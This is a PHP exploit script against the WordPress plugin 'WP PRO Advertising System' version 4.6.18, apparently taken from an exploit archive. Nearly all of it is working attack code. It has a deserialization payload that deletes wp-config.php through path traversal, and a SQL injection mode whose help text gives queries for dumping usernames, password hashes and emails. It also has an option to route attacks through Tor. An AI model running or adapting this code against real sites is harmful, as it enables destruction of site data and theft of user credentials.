<?php
/**
* Exploit Titie: WP PRO Advertising System - All In One Ad Manager Exploit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://wordpress-advertising.com/
* Software Link: http://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693
* Version: 4.6.18
* Tested on: Debian 8, PHP 5.6.17-3
* Type: SQLi, Unserialize, File Delete.
* Time line: Found [06-May-2016], Vendor notified [06-May-2016], Vendor fixed: [???], [RD:1464914936]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:f:c:u:p:s:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
class CPDF_Adapter{
private $_image_cache;
public function set_file($file){
$this->_image_cache = array($file);
}
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'd'){
echo "Delete mode\n";
$pay_load_obj = new CPDF_Adapter();
$pay_load_obj->set_file('../../../../../../wp-config.php', '../../../../../../wp-config.php' );
$pay_load = base64_encode(serialize(array($pay_load_obj)));
$data = array('stats_pdf'=>'1', 'data'=>$pay_load);
$curl->post($options['t'].'?'.http_build_query($data));
$resp = $curl->getResponse();
echo $resp;
} else {
echo "SQLi mode \n";
echo "Trying a longin...\n";
logIn();
echo "Running SQL in Inject mode: ".$options['s']."\n";
$pay_load = array('action'=>'load_stats', 'group'=>'1=1 UNION ALL SELECT ('.$options['s'].') LIMIT 1,1# ', 'group_id'=>'1', 'rid'=>1);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $pay_load);
$resp = $curl->getResponse();
//Grab the output
if (preg_match('~<div class="am_data">(.*?)(?:</div)~', $resp, $mat)){
if (isset($mat[1])){
echo "Response:\n".$mat[1]."\n";
die("Done\n");
}
}
echo "Failed getting SQLi response, response saved to resp.html\n";
file_put_contents('resp.html', $resp);
}
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('d','s') ) ){
return false;
}
if ($options['m'] == 's' && (!isset($options['u']) || !isset($options['p']) || !isset($options['s'])) ){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
WP PRO Advertising System - All In One Ad Manager Expoit Pack
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USER] -p [password] -m [MODE] -s [SQL]
*** In order to use the SQLi part you need an advertiser login **
[TARGET_URL] http://localhost/wordpress/
[MODE] d - Delete wp-config.php
s - SQL Injection
[TOR] Use tor network? (Connects to 127.0.0.1:9150)
Note: In SQLi mode, you can't use ' or ", and you are in a subselect.
To get all users and passwords you would do :
SELECT concat(user_login,0x3a,user_pass,0x3a,user_email) FROM wp_users LIMIT 1
SELECT concat(user_login,0x3a,user_pass) FROM wp_users LIMIT 1,1
SELECT concat(user_login,0x3a,user_pass) FROM wp_users LIMIT 2,1
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u user -p password -m d // Try to delete some files
php $argv[0] -t http://localhost/wordpress -u user -p password -m s -s 'SELECT concat(user_login,0x3a,user_pass,0x3a,user_email) FROM wp_users LIMIT 1'
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
